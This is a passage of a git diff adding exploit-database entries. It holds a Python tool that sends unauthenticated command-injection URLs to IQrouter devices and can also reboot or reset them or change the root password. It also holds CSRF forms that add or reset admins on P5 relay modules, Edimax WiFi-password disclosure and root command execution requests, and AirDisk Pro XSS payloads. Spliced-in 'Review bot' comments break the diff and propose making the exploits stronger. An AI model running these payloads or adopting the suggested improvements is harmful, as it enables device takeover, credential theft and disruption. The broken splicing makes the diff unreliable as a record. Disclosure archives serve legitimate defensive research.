"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/", + "RCE /diag_set_device_name (device_name param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/", + "RCE /diag_pppoe_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/", + "RCE /diag_pppoe_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/", + "RCE /diag_pppoe (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/", + "RCE /diag_pppoe (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/", + "RCE /diag_pppoa_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/", + "RCE 
/diag_pppoa_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/", + "RCE /diag_pppoa (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/", + "RCE /diag_pppoa (wan_password param)" + ], + [ + "/cgi-bin/luci/er/advanced_link?link='`{}`'", + "RCE /advanced_link (link param)" + ] + +] + +advanced_payloads = [ + [ + "/cgi-bin/luci/er/reboot_link?reboot=1", + "Reboot IQrouter (/reboot_link reboot param))" + ], + [ + "/cgi-bin/luci/er/screen2?reboot=1", + "Reboot IQrouter (/screen2 reboot param))" + ], + [ + "/cgi-bin/luci/er/index?reset_config=1", + "Reset IQrouter (/index reset_config param)" + ], + [ + "/cgi-bin/luci/er/screen7?upgrade=1", + "Upgrade IQrouter (/screen7 upgrade param)" + ], + [ + "/cgi-bin/luci/er/vlanTag?restart_network=1", + "Restart network (/vlanTag restart_network param)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/start", + "Start iperf script (/diag_iperf_cmd/start)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/stop", + "Stop iperf script (/diag_iperf_cmd/stop)" + ], + [ + "/cgi-bin/luci/er/get_syslog", + "Router setup info log (/get_syslog)" + ], + [ + "/cgi-bin/luci/er/diag_set_password/c00lpasswd/", + "Change root password to c00lpasswd (can change in code)" + ], + [ + "/cgi-bin/luci/er/reset_password/", + "Change root password to 'changeme' (static)" + ] +] + + +def print_payloads(): + print('#' * 30) + print("Payloads list") + num = 1 + print('######################### RCE without auth ########################') + for payload in rce_any: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '############### RCE (router need to be in setup mode) ###############') + for payload in rce_setup: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '######################### Advanced payloads #########################') + for payload in advanced_payloads: + print("{} - {}".format(num, payload[1])) + num += 1 + + +parser = argparse.ArgumentParser(description="IQrouter 
multiple RCE") +parser.add_argument('--host', help='Host', type=str) +parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int) +parser.add_argument('-n', '--num', help='Payload number', + default=0, type=int) +parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', + default="pwd", type=str) +parser.add_argument('--protocol', help='Protocol (http/https)', + default="http", type=str) + +args = parser.parse_args() + + +def main(): + print("") + full_payload_list = rce_setup + rce_any + advanced_payloads + payloads_amount = len(full_payload_list) + try: + hostname = args.host + port = args.port + payload_num = int(args.num) + bash_cmd = args.cmd + protocol = args.protocol + + if payload_num < 1 or payload_num > payloads_amount: + print("Error with payload number!") + raise IndexError + if port < 0 or port > 65535: + print("Error with port number") + raise IndexError + if protocol not in ['http', 'https']: + print("Error with protocol name") + raise IndexError + + current_payload = full_payload_list[payload_num - 1] + print("Payload: {}".format(current_payload[1])) + print("Host: {}".format(hostname)) + print("Port: {}".format(port)) + print("Protocol: {}".format(protocol)) + print("Command: {}".format(bash_cmd)) + + full_url = "{}://{}:{}{}".format(protocol, hostname, port, + current_payload[0].format(bash_cmd)) + print("Built URL: {}".format(full_url)) + + r = requests.get(full_url) + print("Status code: {}".format(r.status_code)) + return + except IndexError: + parser.print_help() + print_payloads() + exit(1) + + +if __name__ == '__main__': + print( + "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.") + exit(main()) \ No newline at end of file diff --git a/exploits/hardware/webapps/48362.txt b/exploits/hardware/webapps/48362.txt new file mode 100644 index 000000000..671415866 --- /dev/null +++ b/exploits/hardware/webapps/48362.txt 
@@ -0,0 +1,90 @@ +# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) +# Google Dork:jizhicms +# Date: 2020-04-18 +# Exploit Author: iej1ctk1g +# Product web page: https://www.p5.hu +# Affected version: 1.0.20, 1.0.11 +# CVE : N/A + +<!-- + + +P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting + + +Vendor: P5 +Product web page: https://www.p5.hu +Affected version: 1.0.20, 1.0.11 + +Summary: The FNIP-8x16A is an eight channel relay module used for switching any +type of load that doesn’t exceed the specifications. Via its built-in web site +and TCP/IP communication, the outputs and inputs can be controlled and monitored +from standard network capable devices such as computers, smartphones, web-tablets, +etc. either locally or via the network. The module can be used independently or +as part of a complex control system in residential and commercial installations. + +Desc: The controller suffers from CSRF and XSS vulnerabilities. The application +allows users to perform certain actions via HTTP requests without performing any +validity checks to verify the requests. This can be exploited to perform certain +actions with administrative privileges if a logged-in user visits a malicious web +site. Input passed to several GET/POST parameters is not properly sanitised before +being returned to the user. This can be exploited to execute arbitrary HTML and +script code in a user's browser session in context of an affected site. 
+ +Tested on: Linux + CGI + + +Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5564 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php + + +29.01.2020 + +--> + + +<!-- CSRF add admin user --> +<html> + <body> + <form action="http://192.168.1.17:83/user.cgi" method="POST"> + <input type="hidden" name="uno" value="1" /> <!-- User number (user1) --> + <input type="hidden" name="un" value="testingus" /> <!-- Username --> + <input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer --> + <input type="hidden" name="enabled" value="1" /> + <input type="hidden" name="pw" value="123456" /> + <input type="hidden" name="pw2" value="123456" /> + <input type="submit" value="Zubmit" /> + </form> + </body> +</html> + +<!-- CSRF change admin password --> +<html> + <body> + <form action="http://192.168.1.17:83/user.cgi" method="POST"> + <input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow --> + <input type="hidden" name="pw" value="123456" /> + <input type="hidden" name="pw2" value="123456" /> + <input type="submit" value="Zubmit" /> + </form> + </body> +</html> + +<!-- XSS modify labels --> +<html> + <body> + <form action="http://192.168.1.17:83/config.html" method="POST"> + <input type="hidden" name="lab1" value="Channel1" /> + <input type="hidden" name="lab2" value="Channel2" /> + <input type="hidden" name="lab3" value="Channel3" /> + <input type="hidden" name="lab4" value='"><script>confirm(251)</script>' /> + <input type="hidden" name="lab12" value="etc." /> + <input type="submit" value="Zubmit" /> + </form> + </body> +</html> \ No newline at end of file diff --git a/exploits/hardware/webapps/48365.txt b/exploits/hardware/webapps/48365.txt new file mode 100644 index 000000000..c8a33a664 --- /dev/null +++ b/exploits/hardware/webapps/48365.txt 
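Review bot: The header metadata contradicts the advisory body: `# Google Dork:jizhicms` has nothing to do with the P5 relay module and reads like a leftover from another template, and `# Exploit Author: iej1ctk1g` disagrees with the body's own credit line `Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic` (which is also misspelt). The header title `Cross-Site Request Forgery (Add Admin)` and the body heading `P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting` should be reconciled so a reader knows which of the three PoC forms is the primary finding. I would change the two header lines to `# Google Dork: N/A` and `# Exploit Author: Gjoko 'LiquidWorm' Krstic` (or add a `# Credit:` line), and fix the typo to `Vulnerability discovered by`. Note also that the second form (change admin password) omits the `uno` field the first form sends, so it is not clear from the PoC which user record it rewrites — presumably the device matches on `un`, but that is worth confirming in the text.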
@@ -0,0 +1,94 @@
+# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password)
+# Date: 2020-04-21
+# Exploit Author: Besim ALTINOK
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Version:1.13
+# Tested on: Edimax EW-7438RPn 1.13 Version
+
+-----------------------------
+Here step by step :
+
+ 1. I did Setup
+ 2. After setup try to access to *wlencrypt_wiz.asp* file
+ 3. After access to this file, I saw some information disclosure
+(Like *WiFi Password*)
+ 4. Here is the all leak here:
+
+-------------------------------
+
+<SCRIPT>
+var _DATE_="Mon Sep 24 19:38:17 CST 2012";
+var _VERSION_="1.13";
+var _MODEL_="EW7438RPN";
+var _MODE_="Edimax";
+var _PLATFORM_="RTL8196CS_1200";
+var _HW_LED_WPS_="4";
+var _HW_LED_POWER_="6";
+var _HW_LED_WIRELESS_="2";
+var _HW_BUTTON_RESET_="5";
+var _HW_BUTTON_WPS_="1";
+var _HW_BUTTON_SWITCH_="3";
+var _HW_LED_USB_="17";
+var _WIRELESS_IGMPSNOOP_="y";
+var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y";
+var _RDISC_="y";
+var _WPS_NO_BROADCAST_="y";
+var _UPNP_LIB_VERSION2_="y";
+var _WDS_UR_INFO_="y";
+var _RESERVE_ENCRYPTION_SETTING_="y";
+var _IGMP_PROXY_="y";
+var _IGMPSNOOP_="y";
+var _RFTYPE_="2T2R";
+var _MEMBUS_="16";
+var _MEMSIZE_="16";
+var _MEMTYPE_="SDRAM";
+var _FLASHTYPE_="SPI";
+var _REMOVE_RADIUS_SERVER_="y";
+var _AUTO_CHANNEL_DET_="y";
+var _CONTROL_SIDEBAND_="y";
+var _WIFI_11N_STANDARD_="y";
+var _SETTING_WIZARD_="y";
+var _CONFIG_FILE_NAME_="7438RPN";
+var _AP_WITH_DNS_="y";
+var _USE_DNRD_="y";
+var _WPS_MIX_="y";
+var _POWER_SAVING_="y";
+var _WEB_FILE_NAME_="7438RPN";
+var _PINCODE_BY_MAC_="y";
+var _UPNP_RESPONDER_="y";
+var _MDNS_RESPONDER_="y";
+var _NETBIOS_RESPONDER_="y";
+var _AP_WITH_DHCP_CLIENT_="y";
+var _LLTD_NODENAME_="y";
+var _DHCP_SWITCH_="y";
+var _CONNECT_TEST_="y";
+var _START_BOA_="y";
+var _WPS_Daemon_="y";
+
+var security = 1;
+apMode = 6;
+methodVal = 2;
+opMode = 0;
+apMachType = 1;
+
+var ssidTbl = new Array("PentesterTraining");
+var mirrorTbl = "";
+var secModeTbl = new Array("2");
+var enable1XTbl = new Array("0");
+var _1xMode = "0";
+var wepTbl = new Array("0");
+var keyTypeTbl = new Array("1");
+var wpaCipherTbl = new Array("2");
+var pskFormatTbl = new Array("0");
+var pskValueTbl = new Array("wifipass123.");
+var defaultKeyIdTbl=new Array("0");
+var rsIp= "";
+var rsPort= "1812";
+var rsPassword= "";
+
+
+--
+
+Besim ALTINOK
+
+*Security Engineer*
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48366.txt b/exploits/hardware/webapps/48366.txt
new file mode 100644
index 000000000..5c8644f07
--- /dev/null
+++ b/exploits/hardware/webapps/48366.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
+# Date: 2020-04-21
+# Exploit Author: Besim ALTINOK
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Version:1.13
+# Tested on: Edimax EW-7438RPn 1.13 Version
+
+
+CSRF PoC - Mac Filtering
+----------------------------------------------------------------------------------------------------------
+<html>
+ <body>
+ <script>history.pushState('', '', '/')</script>
+ <form action="http://172.20.10.2/goform/formWlAc" method="POST">
+ <input type="hidden" name="wlanAcEnabled" value="ON" />
+ <input type="hidden" name="tiny_idx" value="0" />
+ <input type="hidden" name="mac" value="ccbbbbbbbbbb" />
+ <input type="hidden" name="comment" value="PentesterTraining" />
+ <input type="hidden" name="addFilterMac" value="Add" />
+ <input type="hidden" name="submit-url"
+value="/macfilter1_sub1.asp" />
+ <input type="hidden" name="wlanSSIDIndex" value="1" />
+ <input type="submit" value="Submit request" />
+ </form>
+ </body>
+</html>
+
+--
+
+Besim ALTINOK
+
+*Security Engineer*
\ No newline at end of file
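Review bot: The write-up never gives the actual request or says whether `wlencrypt_wiz.asp` was fetched with or without the admin Basic-Auth credentials, so a reader cannot tell whether this is pre-authentication disclosure of the PSK or an authenticated page that embeds it — those are very different severities. Step 2 should be a reproducible command with the auth state stated explicitly, e.g. `curl -s http://<extender>/wlencrypt_wiz.asp | grep -E 'ssidTbl|pskValueTbl'` followed by a sentence such as `No Authorization header was sent`, if that is what was observed. The dump also exposes `rsPassword` next to `pskValueTbl`; it is empty here, but on a RADIUS-backed deployment that field would presumably carry the shared secret, which is worth noting as additional impact.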
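Review bot: The PoC only fires if the victim clicks the visible `Submit request` button; a CSRF proof should submit on page load, e.g. add `<script>document.forms[0].submit()</script>` after the `</form>` and drop the visible button, so the single-visit precondition is actually demonstrated. The advisory also does not say under which session the forged POST is accepted — the companion 48377 write-up in this commit shows the same device using HTTP Basic auth (`Authorization: Basic ...`), and if that is the only session mechanism the browser attaches cached credentials automatically, which is what makes the CSRF exploitable and should be stated. Finally, the effect of `wlanAcEnabled=ON` combined with a single attacker-chosen `mac` is not described: depending on whether the list is allow or deny, it either whitelists one attacker MAC or locks legitimate clients out, and the reader should be told which was observed.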
diff --git a/exploits/hardware/webapps/48377.txt b/exploits/hardware/webapps/48377.txt
new file mode 100644
index 000000000..6d6bf69e5
--- /dev/null
+++ b/exploits/hardware/webapps/48377.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution
+# Date: 2020-04-23
+# Exploit Author: Besim ALTINOK
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Version:1.13
+# Tested on: Edimax EW-7438RPn 1.13 Version
+
+------
+
+NOTE: This device configurated with root permissions. So you can run the
+command as root
+
+Here is the detail(s) of the RCE(s)
+
+1- Content of the mp.asp file
+
+<form action="/goform/mp" method="POST" name="mp">
+ <input type="text" name="command" value=""> <input
+type="submit" value="GO">
+ <input type="hidden" name="getID" value="">
+ <input type="hidden" name="getID" value="">
+</form>
+
+RCE Detail:
+-------------------------------
+
+POST /goform/mp HTTP/1.1
+Host: 192.168.2.2
+User-Agent: Mozilla/5.0 *********************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 25
+DNT: 1
+Authorization: Basic YWRtaW46MTIzNA==
+Connection: close
+Cookie: language=1
+Upgrade-Insecure-Requests: 1
+
+command=||busybox+ls&getID=
+
+-------------------------------
+
+2- Content of the syscmd.asp
+
+<form action=/goform/formSysCmd method=POST name="formSysCmd"><table
+border=0 width="500" cellspacing=0 cellpadding=0>
+<tr><font size=2>
+This page can be used to run target system command.</tr>
+<tr><hr size=1 noshade align=top></tr>
+<tr> <td>System Command: </td>
+ <td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td>
+ <td> <input type="submit" value="Apply" name="apply" onClick='return
+saveClick()'></td></form>
+
+
+RCE Detail:
+-------------------------------
+
+POST /goform/formSysCmd HTTP/1.1
+Host: 192.168.2.2
+User-Agent: Mozilla/5.0 *********************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 11
+DNT: 1
+Authorization: Basic YWRtaW46MTIzNA==
+Connection: close
+Cookie: language=1
+Upgrade-Insecure-Requests: 1
+
+sysCmd="command to here"
\ No newline at end of file
diff --git a/exploits/ios/webapps/48321.txt b/exploits/ios/webapps/48321.txt
new file mode 100644
index 000000000..833bae26a
--- /dev/null
+++ b/exploits/ios/webapps/48321.txt
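Review bot: Both requests carry `Authorization: Basic YWRtaW46MTIzNA==`, which decodes to `admin:1234`, so this is post-authentication command execution, yet the title and header give no hint of that; change the first line to `# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution (Authenticated)` and add a line such as `# Note: requires the web-admin credentials (admin:1234 in the tested setup)`. The `syscmd.asp` form literally says `This page can be used to run target system command`, so the second vector is an exposed maintenance feature rather than an injection bug, and the write-up should say so because the fix is removing or gating the page, not input filtering. For `/goform/mp` the `||busybox+ls` payload does suggest shell metacharacters reaching a shell, but no response is shown; including the `ls` output would make the claim verifiable. The `maxlength="50"` on `sysCmd` is client-side only and should not be read as a limit on the payload.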
@@ -0,0 +1,417 @@ +# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: http://www.app2pro.com +# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 +# CVE: N/A + +Document Title: +=============== +AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2203 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2203 + + +Common Vulnerability Scoring System: +==================================== +4.5 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +File sharing with other iOS devices via Bluetooth or Wi-Fi connection +with automatic search of nearest devices. +Users can perform file operations on the application like: Copy, Move, +Zip, Unzip, Rename, Delete, Email, and more. +Easy to create file like: Text File, New folder, Playlist, Take +Photo/Video, Import From Library, and Voice Record. +AirDisk Pro allows you to store, view and manage files on your iPhone, +iPad or iPod touch. You can connect to AirDisk +Pro from any Mac or PC over the Wi-Fi network and transfer files by drag +& drop files straight from the Finder or Windows +Explorer. AirDisk Pro features document viewer, PDF reader, music +player, image viewer, voice recorder, text editor, file +manager and support most of the file operations: like delete, move, +copy, email, share, zip, unzip and more. 
+ +(Copy of the Homepage: +https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 ) +(Copy of the Homepage: http://www.app2pro.com ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile +application. + + +Affected Product(s): +==================== +Felix Yew +Product: AirDisk Pro v5.5.3 (iOS) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +No authentication (guest) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site scripting vulnerability has been +discovered in the official SuperBackup v2.0.5 ios mobile application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise the mobile +web-application from the application-side. + +The first vulnerability is located in the `createFolder` parameter of +the `Create Folder` function. Attackers are able to name +or rename paths via airdisk pro ui to malicious persistent script codes. +Thus allows to execute the persistent injected script +code on the front site of the path index listing in the content itself +on each refresh. The request method to inject is POST +and the attack vector is located on the application-side. Interaction to +exploit is as well possible through the unauthenticated +started ftp service on the local network. 
+ +The second vulnerability is located in the `deleteFile` parameter of the +`Delete` function. The output location with the popup +that asks for permission to delete, allows to execute the script code. +The injection point is the file parameter and the execution +point occurs in the visible delete popup with the permission question. +The request method to inject is POST and the attack vector +is located on the application-side. + +The third web vulnerability is located in the `devicename` parameter +that is displayed on the top next to the airdisk pro ui logo. +Remote attackers are able to inject own malicious persistent script code +by manipulation of the local apple devicename information. +The injection point is the devicename information and the execution +point occurs in the file sharing ui panel of the airdisk pro +mobile web-application. + +Remote attackers are able to inject own script codes to the client-side +requested vulnerable web-application parameters. The attack +vector of the vulnerability is persistent and the request method to +inject/execute is POST. The vulnerabilities are classic client-side +cross site scripting vulnerabilities. Successful exploitation of the +vulnerability results in session hijacking, persistent phishing +attacks, persistent external redirects to malicious source and +persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] AirDisk pro Wifi UI + +Vulnerable Parameter(s): +[+] createFolder +[+] deleteFile +[+] devicename + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with wifi access with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +1. 
Create Folder + +PoC: Vulnerable Source +<tbody> +<form name="checkbox_form"></form> +<tr><td class="e"><input type="checkbox" name="selection" +value="test"></td><td class="i"><a href="test/"><img +src="/webroot/fileicons/folder.png" +width="20" height="20"></a></td><td class="n"><a +href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td +class="s"></td><td class="k">Folder</td> +<td class="e"><span style="height:15px; +width:15px;"> </span></td><td class="e"><a href="#" title="Rename +file" onclick="modalPopup("test", 0, 0);"> +<img src="/webroot/webrename.png" width="15" height="15"></a></td><td +class="e"><a href="#" title="Delete file" +onclick="modalPopup("test", 2, 0);"> +<img src="/webroot/webdelete.png" width="15" +height="15"></a></td></tr><tr class="c"><td class="e"><input +type="checkbox" name="selection" +value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a +href="[MALICIOUS INJECTED SCRIPT +CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/"> +<img src="/webroot/fileicons/folder.png" width="20" +height="20"></a></td><td class="n"> +<a href="[MALICIOUS INJECTED SCRIPT +CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe +src="evil.source"></a></td> +<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td +class="k">Folder</td><td class="e"><span style="height:15px; +width:15px;"> </span></td><td class="e"> +<a href="#" title="Rename file" +onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS +INJECTED SCRIPT CODE!];, 0, 1);"> +<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td +class="e"> +<a href="#" title="Delete file" +onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS +INJECTED SCRIPT CODE!];, 2, 1);"> +<img src="/webroot/webdelete.png" width="15" +height="15"/></a></td></tr><tr><td class="e"><input type="checkbox" +name="selection" value="Help.webarchive" /></td> +<td class="i"><a href="Help.webarchive"><img +src="/webroot/fileicons/webarchive.png" 
width="20" +height="20"></a></td><td class="n"> +<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec +2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web +Archive</td> +<td class="e"><a href="#" title="Download file" +onClick="downloadFile("Help.webarchive");"><img +src="/webroot/webdownload.png" +width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename +file" onClick="modalPopup("Help.webarchive", 0, 2);"> +<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td +class="e"><a href="#" title="Delete file" +onClick="modalPopup("Help.webarchive", 2, 2);"><img +src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr> +</form> +</tbody> +</table> +</div> + + +--- PoC Session logs [POST] --- +http://localhost:80/ +Host: localhost:80 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 68 +Origin: http://localhost:80 +Connection: keep-alive +Referer: http://localhost:80/ +Upgrade-Insecure-Requests: 1 +createFolder=test>"<[MALICIOUS INJECTED SCRIPT +CODE!]>&ID=0&submitButton=Create +- +POST: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 6257 + +Note: Adding via ftp on mkdir or file is as well possible without +authentication on default setup. + + + +2. 
Delete / Old Popup + +PoC: Vulnerable Source +<div id="modal-content" class="simplemodal-data" style="display: block;"> + <div id="modal-title"><h3>Delete File</h3></div> + <div id="modal-text"><a>Are you sure you want to delete this +file?"test"</a></div> + <form name="input" action="" method="post"> + <div id="modal-field"><input type="hidden" name="deleteFile" +value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT +CODE]"></div> + <input type="hidden" name="ID" id="ID" value="test"> + <input type="submit" name="submitButton" id="submitButton" value="Delete"> + </form> +</div> + + +--- PoC Session logs [POST] --- +http://localhost:80/ +Host: localhost:80 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 55 +Origin: http://localhost:80 +Connection: keep-alive +Referer: http://localhost:80/evil.source +Upgrade-Insecure-Requests: 1 +deleteFile=New Folder&ID=New Folder&submitButton=Delete +- +POST: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 4699 + + +Note: Comes up when somebody tries to delete the malicious injected path. + + +3. 
Devicename + + +PoC: Vulnerable Source +<div id="headerWraper"> + <table border="0" cellspacing="0" cellpadding="0" width="100%"> + <tr> + <td><a href="./"><img src="/webroot/webicon.png" id="headerImg" +width="57" height="57"/></a></td> + <td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td> + </tr> + </table> +</div> + + +--- PoC Session logs [GET] --- +http://localhost:80/ +Host: localhost:80 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 55 +Origin: http://localhost:80 +Connection: keep-alive +Referer: http://localhost:80/evil.source +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 4612 + +Note: Executes each time the wifi sharing ui service of airdisk pro is +opened by the local or remote users. + + +Solution - Fix & Patch: +======================= +1. Disallow special chars in the folder and filenames. Sanitize all +inputs and filter all involved parameters to prevent application-side +attacks. +2. Parse the output location of the popup permission message content to +prevent further executions after injects via post method. +3. Sanitize the devicename displayed on top of the wifi user interaction +by a secure parsing mechanism. + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerabilities +in the application functions are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. 
Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. 
+ + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48322.txt b/exploits/ios/webapps/48322.txt new file mode 100644 index 000000000..afef029c9 --- /dev/null +++ b/exploits/ios/webapps/48322.txt 
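Review bot: The Technical Details section opens with `discovered in the official SuperBackup v2.0.5 ios mobile application`, which is the sibling advisory (48322 in this same commit), not this product; it should read `discovered in the official AirDisk Pro v5.5.3 ios mobile application`. The third vector (`devicename`) is injected by renaming the iOS device itself, which a Wi-Fi peer cannot do, so `Exploitation Technique: Remote` and the phrase "remote attackers are able to inject" overstate that case — it is better described as an injection requiring control of the device that then executes for remote viewers of the sharing UI. The [GET] session log for that vector also carries `Content-Type` and `Content-Length: 55` headers copied from the earlier POST log, which makes the reproduction look like a POST; trimming them would avoid confusion. The trailing note that `mkdir` over the unauthenticated FTP service also plants the payload is the most important pre-auth path for vector 1 and deserves a numbered step in the Proof of Concept rather than an afterthought.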
